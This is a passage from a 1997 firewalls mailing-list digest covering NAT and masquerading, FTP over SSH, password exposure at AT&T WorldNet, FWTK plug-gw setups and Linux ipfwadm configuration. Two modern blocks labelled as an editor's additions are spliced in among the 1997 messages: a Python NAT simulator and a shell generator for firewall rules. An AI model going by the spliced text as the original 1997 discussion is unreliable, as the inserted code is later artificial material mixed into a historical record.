3.0] Search out Adrian Cockroft's columns on www.sun.som/sunworld for more info.

Until next time,
Drexx.

"It's a dirty job, but somebody's gotta do it." -- John Wayne

DEXTER D. LAGGUI
Systems Engineer, Systems Integration Group
PHILIPPINE SYSTEMS PRODUCTS INC.
Penthouse, Corporate Business Center
150 Paseo de Roxas Ave., Legaspi Village
Makati City, Philippines
Phone: (++ 63-2) 813-6453 to 55 loc. 222
Fax : (++ 63-2) 813-5834
Email: drexx@pspi.com.ph
Pager: (++ 63-2) 1277-33615

From owner-firewalls-outgoing Tue Jun 3 00:15:41 1997
Message-Id: <01BC6FFB.76D33980@pc00874.ina.de>
From: Basil McCrea
To: "'firewalls@greatcircle.com'"
Subject: Netscape and Port IS411-srvr
Date: Tue, 3 Jun 1997 08:52:26 +0200

Hi,

We have a few NT boxes with Netscape, and our firewall logs show that they try to access 205.218.156.41 on port 6499 (IS411-srvr). Network 205.218.156 belongs to Netscape. Does anyone know what they are trying to do?
TIA
Basil McCrea

From owner-firewalls-outgoing Tue Jun 3 01:00:16 1997
From: "Tony Rall"
To: firewalls@greatcircle.com
Message-ID: <882564AB.002AE100.00@mailgw1.almaden.ibm.com>
Date: Tue, 3 Jun 1997 00:53:31 -0700
Subject: Re: Difference between NAT and IP Masquerading

>Could someone explain the difference between Network Address Translation
>and IP Masquerading. Which is better to use? What firewall products
>offer which?

NAT supports hiding n internal addresses behind m external addresses, where n is usually less than m.

IPMasq is a subset of NAT where n=1.

One of these is likely available on a number of products; IBM's Firewall (nee SNG) supports NAT.

Tony Rall

From owner-firewalls-outgoing Tue Jun 3 01:30:21 1997
From: ArkanoiD
Message-Id: <199706030750.LAA26531@paranoid.convey.ru>
Subject: Re: SSH Equiv for FTP?
To: warpy@null.net (Warpy)
Date: Tue, 3 Jun 1997 11:50:25 +0400 (MSD)
Cc: firewalls@GreatCircle.COM
In-Reply-To: from "Warpy" at Jun 2, 97 04:01:30 pm

nuqneH,

> I was wondering whether there was an equivalent to SSH for ftp. Does
> anyone know if there is?

You can use ftp over ssh with the port forwarding feature..

--
CU in Hell /Arkan#iD
Do I believe in the Bible? Hell, man, I've seen one!

From owner-firewalls-outgoing Tue Jun 3 04:30:14 1997
Message-Id: <199706031127.HAA04720@smb.research.att.com>
From: Steve Bellovin
To: firewalls@greatcircle.com
Subject: Re: Bungled password management at WorldNet
Date: Tue, 03 Jun 1997 07:27:32 -0400

Enclosed below is my note to RISKS on the report of a security problem at AT&T Worldnet.

------- Forwarded Message

From: Steve Bellovin
To: risks@csl.sri.com
Subject: Re: How Secure Is AT&T's WorldNet Security?
Date: Thu, 29 May 1997 23:04:22 -0400
Sender: smb@smb.research.att.com

The story about an eavesdropping incident on AT&T Worldnet is incorrect. In fact, a later story by the same author says as much (see http://www.pcworld.com/news/daily/data/0597/970523154723.html). But there are some lessons to be learned from what happened.

The original report noted that certain Web pages do not use encryption. We were already aware of this, and the upgrade was in progress even before this incident. But the report also claimed that as a result of the lack of encryption, a customer was able to observe other accounts and passwords going by. This struck us as more than slightly odd, since the user was coming in from a dial-up modem...

I won't bother enumerating all the possibilities we considered and investigated. The ultimate answer was that there was no eavesdropping going on; rather, a network administrator had extracted accounts and passwords for a number of users from a LAN-based file server, and fed these into a simulated network monitor program.

And how did these passwords get there? Well, various people used a shared facility -- that is, a network of PCs -- as their platform for connecting to AT&T Worldnet. This exposed their passwords to anyone with suitable access to the file server -- which is what happened.

What can we learn from this?

The first point, of course, is that the system administrator wins -- always. Nothing short of token-based encryption is even a plausible defense against someone who can read any file, and plant programs to monitor keystrokes. (That latter didn't happen here, to my knowledge.)

A corollary is that you can't meaningfully encrypt such files, if the enemy is a knowledgeable administrator. If the key is stored in your programs, it can be extracted; the same skills that are used to defeat copy protection will suffice.
At most, such encryption is a minor hurdle; more likely, it's security through obscurity, giving the same grade of protection as the lock on a bathroom door.

Could the user supply the key? Part of the answer is "no, see above about keystroke monitors". But there's a more fundamental issue, one that goes to the heart of the real problem.

When we deploy computer systems, we engineer them. That is, we choose among many possible designs, to balance needs against costs. There is no such thing as absolute security, of course; more importantly, there is a price to any security system, and it makes no sense to spend more on security than it can save you.

We're dealing here with a mass market product. J. Random Customer *will*, with a fairly high probability, forget his or her password. The cost of an unrecoverable account is quite high -- we probably lose the customer. But it has to be taken a step further -- it's important to minimize the number of calls to Customer Care. (Customer Care is expensive in the mass market world. There are a fair number of software packages around for which the vendor loses money on any copy that generates even a single call.)

This, then, is the bottom line. The engineers who made certain security choices -- storing account information in the clear -- saved a moderate amount of money, traded against a small diminution in security. The customers who used a shared facility to store these account information files (unknowingly) trusted someone else. The overall complexity of the total system -- the AT&T Worldnet end, the user software, the end users, and their environment, including an untrustworthy administrator -- led to some accounts being compromised. And the one simple palliative cited -- encryption of certain network sessions -- would have done nothing to protect anyone.
--Steve Bellovin

------- End of Forwarded Message

From owner-firewalls-outgoing Tue Jun 3 05:15:32 1997
From: "Chris Kostick"
To: "Ferrell-1, Ema", "'firewalls@greatcircle.com'"
Subject: Re: Difference between NAT and IP Masquerading
Date: Tue, 3 Jun 1997 08:03:52 -0400

> Could someone explain the difference between Network Address Translation
> and IP Masquerading. Which is better to use? What firewall products
> offer which?

IP Masquerading is a subset of NAT. NAT supports address translation in the scenarios of 1:1, many:1, and many:n. IP masquerading is just many:1.
--
Chris

From owner-firewalls-outgoing Tue Jun 3 05:45:22 1997
Date: Tue, 3 Jun 1997 08:40:53 -0400
From: jonesmd@newman (Mike Jones)
Message-Id: <199706031240.IAA15729@bass.unifiedtech.com>
To: mfiocchi@otm.it, firewalls@GreatCircle.COM, carlsonp@sprynet.com
Subject: Re: PIX and Firewall-1

Peter Carlson writes....

> There are many comparisons made by datacomm, lan times, ziff-davis and
> others. Keep in mind that both pix and fw-1 are glorified packet filters,
> even though they have a fancy name for it. I would stick with an
> application level gateway. They are well accepted and known for being more
> secure.

Many things are known that aren't so. This claim comes by periodically in this forum, and I have yet to get an answer to this question: in what way are application level gateways more secure than, say, FW-1 or PIX? There are certainly capabilities that can be provided via application proxies that can't be provided by any filter-based technologies, but what types of attacks are a FW-1 or a PIX vulnerable to that application proxies aren't?

--
Mike Jones
Sr. Technology Advisor
UNIFIED Technologies

From owner-firewalls-outgoing Tue Jun 3 06:30:24 1997
Date: Tue, 03 Jun 1997 15:28:39 +0100
From: "Willibald Kraml"
To: firewalls@GreatCircle.COM
Subject: Re: Difference between NAT and IP Masquerading
Message-ID: <2063292994.865351719@bings.kpmg.co.at>

--On Tuesday, 03 June 1997, 00:53 -0700 "Tony Rall" wrote:

>
>>Could someone explain the difference between Network Address Translation
>>and IP Masquerading. Which is better to use? What firewall products
>>offer which?
> NAT supports hiding n internal addresses behind m external addresses, where n is
> usually less than m.
>
> IPMasq is a subset of NAT where n=1.
>
> One of these is likely available on a number of products; IBM's Firewall (nee
> SNG) supports NAT.
>
> Tony Rall
>

With Linux, IP masquerading hides n internal addresses behind (normally) 1 external address; n usually is at least 2 (one network interface on the masquerading box and at least one client on the internal network). The external address can also be a dynamic IP address, so you can connect a LAN to the Internet with a dial-up IP connection ...

Willi Kraml

From owner-firewalls-outgoing Tue Jun 3 07:13:39 1997
Message-Id: <199706031349.JAA17464@mail.clark.net>
From: "Marcus J. Ranum"
Organization: Network Flight Recorder, Inc.
To: Firewalls@GreatCircle.COM
Date: Tue, 3 Jun 1997 09:47:53 +0000
Subject: Re: Plug-gw- One to many relationship
Reply-to: mjr@clark.net
In-reply-to: <199706030631.XAA11683@honor.greatcircle.com>

> Has anyone gotten a one to many relationship to work
> with FWTK 2.0?

The one to many support requires kernel modifications in order to work. Basically, you need code that absorbs all packets going through the firewall, and then pulls the "real" destination out of the routing layer and connects to it. So, unless you want to spend a month or so on writing some pretty subtle kernel hacks, you can't do it with just FWTK.

mjr.

-----
Marcus J. Ranum, CEO, Network Flight Recorder, Inc.
Personal   Work   New Book!!
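Picking up the NAT vs. IP masquerading thread above (Tony Rall, Chris Kostick and Willi Kraml), here is an added Python simulation, not code from any poster or product, of the three translation shapes they name: 1:1 static NAT, many:1 masquerading and a many:n pool. The addresses, ports and the packet tuple are constructed for the example.

```python
"""Added example (not code from any poster or product): a toy NAT box that
shows 1:1 static NAT, many:1 IP masquerading and a many:n address pool,
and why a masqueraded host is unreachable from outside until it opens a
flow itself.

All addresses, ports and the Packet tuple are constructed for the example
(RFC 5737 documentation ranges), not taken from any real network.
"""
from dataclasses import dataclass, replace
from typing import Dict, List, Optional, Tuple

Endpoint = Tuple[str, int]


@dataclass(frozen=True)
class Packet:
    """Just the four header fields a NAT device rewrites."""
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


class NatBox:
    """Translate between internal hosts and external addresses.

    pool=[one address]           -> many:1 (IP masquerading, ports rewritten)
    pool=[several addresses]     -> many:n (ports still rewritten)
    static={internal: external}  -> 1:1 (address swapped, port kept)
    """

    def __init__(self, pool: List[str], static: Optional[Dict[str, str]] = None,
                 first_port: int = 61000) -> None:
        self.pool = list(pool)
        self.static = dict(static or {})
        self.static_rev = {ext: internal for internal, ext in self.static.items()}
        self.next_port = first_port
        self.out: Dict[Endpoint, Endpoint] = {}   # (int_ip, int_port) -> (ext_ip, ext_port)
        self.back: Dict[Endpoint, Endpoint] = {}  # reverse of self.out

    def _allocate(self, internal: Endpoint) -> Endpoint:
        """Bind a new internal flow to a pool address and a fresh external port.

        The port rewrite is what lets n hosts share one address: two internal
        hosts using the same source port still get distinct external tuples.
        """
        ext_ip = self.pool[len(self.out) % len(self.pool)]   # round-robin over the pool
        while (ext_ip, self.next_port) in self.back:
            self.next_port += 1
        ext = (ext_ip, self.next_port)
        self.next_port += 1
        self.out[internal] = ext
        self.back[ext] = internal
        return ext

    def outbound(self, p: Packet) -> Packet:
        """Rewrite the source of a packet leaving the internal network."""
        if p.src_ip in self.static:
            return replace(p, src_ip=self.static[p.src_ip])   # 1:1, port untouched
        if not self.pool:
            raise ValueError("no external address available for %s" % p.src_ip)
        internal = (p.src_ip, p.src_port)
        ext = self.out.get(internal) or self._allocate(internal)
        return replace(p, src_ip=ext[0], src_port=ext[1])

    def inbound(self, p: Packet) -> Optional[Packet]:
        """Rewrite the destination of a packet arriving from outside.

        Returns None when nothing maps to the destination, i.e. the packet is
        dropped: behind many:1 an inside host only exists to the outside world
        while it has an open flow. A 1:1 host, by contrast, is reachable on
        every port, so exposing it needs separate filtering.
        """
        if p.dst_ip in self.static_rev:
            return replace(p, dst_ip=self.static_rev[p.dst_ip])
        internal = self.back.get((p.dst_ip, p.dst_port))
        if internal is None:
            return None
        return replace(p, dst_ip=internal[0], dst_port=internal[1])


if __name__ == "__main__":
    nat = NatBox(pool=["198.51.100.1"], static={"192.0.2.10": "198.51.100.10"})
    for pkt in (Packet("192.0.2.20", 40000, "203.0.113.5", 80),
                Packet("192.0.2.21", 40000, "203.0.113.5", 80),
                Packet("192.0.2.10", 50000, "203.0.113.5", 80)):
        print("out:", pkt, "->", nat.outbound(pkt))
    print("reply to masqueraded flow:",
          nat.inbound(Packet("203.0.113.5", 80, "198.51.100.1", 61001)))
    print("unsolicited to masqueraded host:",
          nat.inbound(Packet("203.0.113.9", 1234, "198.51.100.1", 22)))
    print("unsolicited to 1:1 host:",
          nat.inbound(Packet("203.0.113.9", 1234, "198.51.100.10", 22)))
```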
From owner-firewalls-outgoing Tue Jun 3 07:31:50 1997
From: "Ge' Weijers"
Message-Id: <199706031422.KAA19020@calamari.Progressive-Systems.Com>
Subject: Re: ipfwadm question
To: Firewalls@GreatCircle.COM
Date: Tue, 3 Jun 1997 10:22:08 -0400 (EDT)
In-Reply-To: <199706030631.XAA11683@honor.greatcircle.com> from "Firewalls-Digest" at Jun 2, 97 11:31:23 pm
Reply-To: ge@progressive-systems.com (Ge' Weijers)
Organization: Progressive Systems, Inc.

>        Gateway Box
>             |
>             |
>        Firewall Box
>             |
>             |
>         LAN Router
>          /  |  \
>         /   |   \
>        /    |    \
>   Node 1  Node 2  Node 3
>

This picture is correct, a 'firewall' is sitting between the Big Bad Internet and your LAN. The 'LAN Router' would be missing at small sites.

This design has its drawbacks if any of 'Node 1..3' has to be accessible from the Internet. Say if Node 1 receives e-mail it can be vulnerable to breakins. Anyone breaking into this machine can then use it as a stepping stone to attack the rest of your network. You may want to place some hosts on the Internet side of the firewall to prevent that from happening. If your Internet gateway has a static packet filtering capability you can further limit your vulnerability by implementing a screened subnet.

                 .------------.           .------------.
  Internet       |            |           |            |
  ---------------|  Gateway   |--+--------|  Firewall  |-----+-------------+-- . . . --+
                 |            |  |        |  (Linux)   |     |             |           |
                 '------------'  |        '------------'     |             |           |
                                 |                           |             |           |
                             .-------.                  .---------.   .--------.   .-------.
                             |       |                  |         |   |        |   |       |
                             | Mail  |                  |  File   |   |  User  |   | User  |
                             | Host  |                  | Server  |   |   PC   |   |  PC   |
                             |       |                  |         |   |        |   |       |
                             '-------'                  '---------'   '--------'   '-------'

I left out your router as it's irrelevant to the discussion. If you put a couple of network cards in the firewall host it can double as a router too. I'm doing just that at the moment; we're running a gateway system with a dynamic packet filter (a MorningStar SecureConnect) and a Linux box acts as a router and static packet filter. We also run the TIS firewall toolkit on the Linux box to allow limited inbound access, though I prefer SSH for that purpose.

Ge'

From owner-firewalls-outgoing Tue Jun 3 08:00:25 1997
Comments: Internet Message: Sender identity is not verified.
From: Ken Kempster
Organization: Republic National Bank
Date: Tue, 03 Jun 1997 10:23:06 -0400 (EDT)
To: Char_Sample@notes.pw.com, fwtk, firewalls
Subject: Plug-gw- One to many relationship more specific info
In-Reply-To: <199706021753.KAA29975@cactus.tc.pw.com>

On 02-Jun-97 Char_Sample@notes.pw.com wrote:
>I've generally had good luck doing it w/ Gauntlet. There really is no
>difference.
>Do you have the plug going one way or both ways?

This is what I'm trying to do:

I currently have a full blown Gauntlet 3.2 running on Solaris. The feature that I need which Gauntlet does not support is service port pools. IE: I want to be able to configure a proxy to listen to multiple service ports or pass traffic at the NAT level on a group of source and destination service ports. Gauntlet has IPFS but this is a one to all, all to one, one to one, or all to all relationship when it comes to service ports. You can not configure IPFS for a group of ports. Yes, IPFILTER does support this but I can't install it on top of the full blown Gauntlet.

So, what I was thinking of doing was using FWTK with IPFILTER. But then you run into the problem of being able to configure a plug-gw that will pass from a single IP to multiple IPs. Plug-gw has to be able to rec. when IPFILTER passes a request to it; the plug needs to pull its destination from that request, like Gauntlet's plug.

I am using this box to firewall market data services and it's very difficult to accommodate all their requirements on one box.

So, this is my problem. If anyone has other suggestions I can try, please let me know.

thanx for any help.
> >char >To: fwtk-users @ tis.com @ Internet, firewalls @ greatcircle.com @ Internet >cc: >From: kempster @ monarch.rnb.com @ Internet >Date: 06/02/97 10:31:54 AM >Subject: Plug-gw- One to many relationship > >Hi all, > > Has anyone gotten a one to many relationship to work >with FWTK 2.0? > > I want to be able to specify x.x.x.x plug-to * > or > x.x.x.x plug-to x.x.x.x x.x.x.x etc. > > >thanx for any help. > > > > > >|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| >| Ken Kempster kempster@monarch.rnb.com | >| Network Systems Engineer _\|/_ | >| Republic National Bank (o o) | >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~oOO-(_)-OOo~~~~~~~~~~~~~~ > > >/* >******************************************************************************* >************* >*/ >/* char sample; that really is my name */ >/* phone: (410)412-8161 */ >/* e-mail: char_sample@notes.pw.com */ >/* >******************************************************************************* >************* >*/ |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| | Ken Kempster kempster@monarch.rnb.com | | Network Systems Engineer _\|/_ | | Republic National Bank (o o) | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~oOO-(_)-OOo~~~~~~~~~~~~~~ From owner-firewalls-outgoing Tue Jun 3 09:55:06 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA14142 for firewalls-outgoing; Tue, 3 Jun 1997 09:43:14 -0700 (PDT) Received: from nebula.is.rpslmc.edu (nebula.is.rpslmc.edu [144.74.19.111]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA14120 for ; Tue, 3 Jun 1997 09:43:08 -0700 (PDT) Received: (qmail 4721 invoked by uid 2001); 3 Jun 1997 16:51:03 -0000 Date: Tue, 3 Jun 1997 11:51:02 -0500 (CDT) From: "Daniel G. Drumm" To: "Kohn, Joav" cc: "'firewalls@greatcircle.com'" Subject: Re: SecureID, CryptoCard, etc... 
In-Reply-To: <0C673F68C3A0D011A94208002BE52625351C@USBGREXCH01> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 30 May 1997, Kohn, Joav wrote: > sorry for the off-topic post, but: > > anybody using keycard authentication to authenticate users in a > winNT/win95 environment? > > my CEO has gone security crazy and would like to implement keycard > authentication across the entire organization. so far, the vendors > haven't been much help with advice on how to get win95 to authenticate > with the cards. any information would be greatly appreciated. > > tia, > -joav kohn > sr. technical consultant > it/workgroup communications > landis & staefa > > (p.s.. this is for LAN/WAN access, not dial-in) Why would the environment have much to do with it? FW1 or TIS Gauntlet come with support for Secure/ID, you can have your employees get these cards, and authenticate against the Firewall. You can then set a user-by-user policy as to what they are allowed access to, and how long they can access it for. -- Daniel G. Drumm - ddrumm@rush.edu Rush Presbyterian St. Luke's Medical Center - Chicago, IL Network Division - Information Services From owner-firewalls-outgoing Tue Jun 3 10:00:43 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA15237 for firewalls-outgoing; Tue, 3 Jun 1997 09:53:40 -0700 (PDT) Received: from challenger.atc.fhda.edu (challenger.atc.fhda.edu [153.18.200.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA15221 for ; Tue, 3 Jun 1997 09:53:34 -0700 (PDT) Received: from localhost (manek@localhost) by challenger.atc.fhda.edu (8.8.0/8.7.3) with SMTP id JAA06233; Tue, 3 Jun 1997 09:57:09 -0700 (PDT) Date: Tue, 3 Jun 1997 09:57:08 -0700 (PDT) From: "Sameer R. Manek" To: Warpy cc: firewalls@GreatCircle.COM Subject: Re: SSH Equiv for FTP?
In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 2 Jun 1997, Warpy wrote: > I was wondering whether there was an equivalent to SSH for ftp. Does > anyone know if there is? > > Warpy > The ssh "package" is supposed to be a replacement for the rsh suite. So ssh comes with ssh, slogin, scp. So scp is the default file copy method, though you can proxy a port via ssh, so if you wanted to in theory you can proxy ftp via ssh. I've never tried it out, so I'm not sure how difficult it is, or practical. I find scp is a lot easier to use. -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Sameer Manek manek@challenger.atc.fhda.edu The last four line .signature file on the entire internet -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From owner-firewalls-outgoing Tue Jun 3 10:46:10 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA20475 for firewalls-outgoing; Tue, 3 Jun 1997 10:43:14 -0700 (PDT) Received: from mail.diginsite.com (mail.diginsite.com [208.2.189.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA20436 for ; Tue, 3 Jun 1997 10:43:00 -0700 (PDT) Received: from march.diginsite.com (march.diginsite.com [208.2.189.102]) by mail.diginsite.com (8.8.5/8.8.3) with ESMTP id KAA06986 for ; Tue, 3 Jun 1997 10:44:49 -0700 Message-Id: <199706031744.KAA06986@mail.diginsite.com> From: "David Lang" To: Subject: NAT on linux firewall? Date: Tue, 3 Jun 1997 09:45:44 -0700 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have had several requests for the summary of NAT on Linux so I am posting this to the list.
Many thanks to Greg Haverkamp who was able to figure this out in the first place and let me know. David Lang

What I found that you can do if you have a finite list of connections you are trying to make (I am connecting many web sites that are inside to the outside) is as follows.

Using Linux kernel version 2.0.30 with FWTK 2
real IP address of f/w: 200.200.200.1
addresses the web sites should appear as: 200.200.200.2 to 200.200.200.200
real IP addresses of web sites: 100.100.100.2 to 100.100.100.200 (for 199 web sites)

For each web site do the following.

Set up the alias:

    ifconfig eth0:2 200.200.200.2

Set up an input firewall filter (I created a file rc.fw that I run after rc.inet1):

    ipfwadm -I -a accept -r 10002 -S 0/0 -D 200.200.200.2 80
    ipfwadm -I -a accept -r 11002 -S 0/0 -D 200.200.200.2 443

Start up two copies of the plug-gw (from the TIS Firewall Toolkit):

    /usr/local/etc/plug-gw -daemon 10002 plug-gw
    /usr/local/etc/plug-gw -daemon 11002 plug-gw

The following two rules should appear in /usr/local/etc/netperm-table:

    plug-gw:port 10002 * -plug-to 100.100.100.2 -port 80
    plug-gw:port 11002 * -plug-to 100.100.100.2 -port 443

What this does: the ifconfig sets the alias so the firewall will listen to the port. The input filters accept an incoming packet from anywhere addressed to 200.200.200.2 on port 80 and change it to arrive at port 10002. The plug-gw then listens at port 10002 and plugs anything it hears to 100.100.100.2 port 80 (standard HTTP port). The other set does the same for the HTTPS SSL connection. To do this you need to have experimental options turned on, normal firewall and forwarding options turned on, and the EXPERIMENTAL IP_TRANSPARENT_PROXY must be turned on for the -r option to work in ipfwadm. This is a very ugly way to do this but it does work. Let me know if you have any other questions.
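The mapping in the summary above is mechanical (redirect port = 10000 + last octet for HTTP and 11000 + last octet for HTTPS, one alias and two plug-gw daemons per public address), so for 199 sites it is better generated than typed. The script below is an added example from the editor, not part of David Lang's post, of FWTK or of the Linux kernel: it prints the rc.fw commands and netperm-table rules for the whole range instead of executing them, so the output can be reviewed before it touches the firewall. The address blocks are the ones in the post; the port-numbering rule and the eth0:N alias index are inferred from the single .2 instance shown and are assumptions, as is the range check (two plug-gw daemons told to bind the same port is the failure it guards against).

```shell
#!/bin/sh
# Editor's added example: generate the per-site ipfwadm redirect / plug-gw /
# netperm-table lines for the scheme described in the message above.
# Assumed conventions (inferred from the .2 instance in the post):
#   HTTP  redirect port = 10000 + last octet
#   HTTPS redirect port = 11000 + last octet
#   alias interface     = eth0:<last octet>
# Nothing is executed; the commands are printed for review.

PUBLIC_NET=200.200.200   # addresses the sites should appear as (from the post)
REAL_NET=100.100.100     # real addresses of the web servers (from the post)
FIRST=2
LAST=200

# Redirect port for one site and one service.
redirect_port() {
    # $1 = last octet, $2 = public service port (80 or 443)
    case "$2" in
        80)  echo $((10000 + $1)) ;;
        443) echo $((11000 + $1)) ;;
        *)   echo "unsupported service port $2" >&2; return 1 ;;
    esac
}

# rc.fw lines that make one public address answer on 80 and 443.
site_commands() {
    n=$1
    p80=$(redirect_port "$n" 80)
    p443=$(redirect_port "$n" 443)
    echo "ifconfig eth0:$n $PUBLIC_NET.$n"
    echo "ipfwadm -I -a accept -r $p80 -S 0/0 -D $PUBLIC_NET.$n 80"
    echo "ipfwadm -I -a accept -r $p443 -S 0/0 -D $PUBLIC_NET.$n 443"
    echo "/usr/local/etc/plug-gw -daemon $p80 plug-gw"
    echo "/usr/local/etc/plug-gw -daemon $p443 plug-gw"
}

# netperm-table rules that tie each redirect port to its real server.
site_netperm() {
    n=$1
    echo "plug-gw:port $(redirect_port "$n" 80) * -plug-to $REAL_NET.$n -port 80"
    echo "plug-gw:port $(redirect_port "$n" 443) * -plug-to $REAL_NET.$n -port 443"
}

# The HTTP redirect range must end below the start of the HTTPS range,
# otherwise two plug-gw daemons would be told to bind the same port.
ranges_ok() {
    # $1 = first octet, $2 = last octet
    [ $((10000 + $2)) -lt $((11000 + $1)) ]
}

# Print the whole rc.fw section followed by the netperm-table section.
generate_all() {
    ranges_ok "$FIRST" "$LAST" || { echo "redirect port ranges overlap" >&2; return 1; }
    echo "# rc.fw"
    n=$FIRST
    while [ "$n" -le "$LAST" ]; do site_commands "$n"; n=$((n + 1)); done
    echo "# netperm-table"
    n=$FIRST
    while [ "$n" -le "$LAST" ]; do site_netperm "$n"; n=$((n + 1)); done
}

generate_all
```

Redirect the output to a file and split it at the `# netperm-table` marker; the first half goes into rc.fw, the second into /usr/local/etc/netperm-table. Keeping the port rule in one function also makes it easy to spot the one thing the post's scheme depends on: every public address needs its own pair of redirect ports, so the two series must never cross.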
David Lang From owner-firewalls-outgoing Tue Jun 3 11:00:16 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA20799 for firewalls-outgoing; Tue, 3 Jun 1997 10:45:45 -0700 (PDT) Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id KAA20727 for ; Tue, 3 Jun 1997 10:45:24 -0700 (PDT) Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id MAA09659; Tue, 3 Jun 1997 12:43:22 -0500 Received: from dns1srv.bridge.com(167.76.36.6) by gatekeeper.Bridge.COM via smap (V1.3) id sma009639; Tue Jun 3 12:43:13 1997 Received: from binki.bridge.com (binki.bridge.com [167.76.24.243]) by dns1srv.bridge.com (8.7.6/8.7.3) with ESMTP id MAA25390; Tue, 3 Jun 1997 12:47:37 -0500 (CDT) Received: (from ken@localhost) by binki.bridge.com (8.7/8.7) id MAA05711; Tue, 3 Jun 1997 12:48:08 -0500 (CDT) Date: Tue, 3 Jun 1997 12:48:08 -0500 (CDT) From: Ken Hardy Message-Id: <199706031748.MAA05711@binki.bridge.com> To: warpy@null.net Subject: Re: SSH Equiv for FTP? Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 2 Jun 1997, Warpy wrote: > I was wondering whether there was an equivalent to SSH for ftp. Does > anyone know if there is? > > Warpy > The SSLeay package has an implementation of SSL-enabled ftp & ftpd, both of which can also interoperate with vanilla counterparts. 
http://www.psy.uq.oz.au/~ftp/Crypto From owner-firewalls-outgoing Tue Jun 3 11:15:48 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA23425 for firewalls-outgoing; Tue, 3 Jun 1997 11:04:52 -0700 (PDT) Received: from stargate.concorde.com (concorde.com [206.137.224.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id LAA23408 for ; Tue, 3 Jun 1997 11:04:45 -0700 (PDT) Received: (from smap@localhost) by stargate.concorde.com (8.6.8.1/8.6.6) id OAA09131; Tue, 3 Jun 1997 14:05:55 -0400 Received: from bheema(198.242.54.246) by stargate via smap (V2.0) id xma009116; Tue, 3 Jun 97 14:05:31 -0400 Received: from bheema (bheema [198.242.54.246]) by bheema.concorde.com (8.7.5/8.7.3) with SMTP id OAA01750; Tue, 3 Jun 1997 14:05:36 -0400 (EDT) Date: Tue, 3 Jun 1997 14:05:36 -0400 (EDT) From: Srinivas Yalavarthy X-Sender: srini@bheema To: fwtk-users@tis.com, firewalls@greatcircle.com Subject: Blocking unwanted junk mail using FWTK Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I would like to know if it's possible to block junk mail using "smap" in FWTK 2.0. If anybody has done this before, I would appreciate it if you can share it with me.
Thanks - Srinivas From owner-firewalls-outgoing Tue Jun 3 12:00:29 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA28171 for firewalls-outgoing; Tue, 3 Jun 1997 11:49:18 -0700 (PDT) Received: from mercury.house.gov (mercury.house.gov [143.231.1.67]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA28138 for ; Tue, 3 Jun 1997 11:49:10 -0700 (PDT) Received: from msg07.house.gov (msg07.house.gov [143.231.207.204]) by mercury.house.gov with SMTP (8.7.1/8.7.1) id OAA22482 for ; Tue, 3 Jun 1997 14:59:15 -0400 (EDT) Received: by msg07.house.gov with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC702D.F0E9E1B0@msg07.house.gov>; Tue, 3 Jun 1997 14:53:47 -0400 Message-ID: From: "Forno, Richard" To: "'Kohn, Joav'" , "'Daniel G. Drumm'" Cc: "'firewalls@greatcircle.com'" Subject: RE: SecureID, CryptoCard, etc... Date: Tue, 3 Jun 1997 14:53:46 -0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk SecurID has a NT/95 workstation client for one-pass authentication. >---------- >From: Daniel G. Drumm[SMTP:dgd@nebula.is.rpslmc.edu] >Sent: Tuesday, June 3, 1997 12:51 PM >To: Kohn, Joav >Cc: 'firewalls@greatcircle.com' >Subject: Re: SecureID, CryptoCard, etc... > >On Fri, 30 May 1997, Kohn, Joav wrote: > >> sorry for the off-topic post, but: >> >> anybody using keycard authentication to authenticate users in a >> winNT/win95 environment? >> >> my CEO has gone security crazy and would like to implement keycard >> authentication across the entire organization. so far, the vendors >> haven't been much help with advice on how to get win95 to authenticate >> with the cards. any information would be greatly appreciated. >> >> tia, >> -joav kohn >> sr. technical consultant >> it/workgroup communications >> landis & staefa >> >> (p.s..
